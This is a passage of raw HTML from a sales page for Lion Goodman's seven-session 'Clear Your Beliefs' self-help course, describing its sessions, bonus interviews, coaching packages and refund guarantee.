<em>don’t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><FONT COLOR="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and 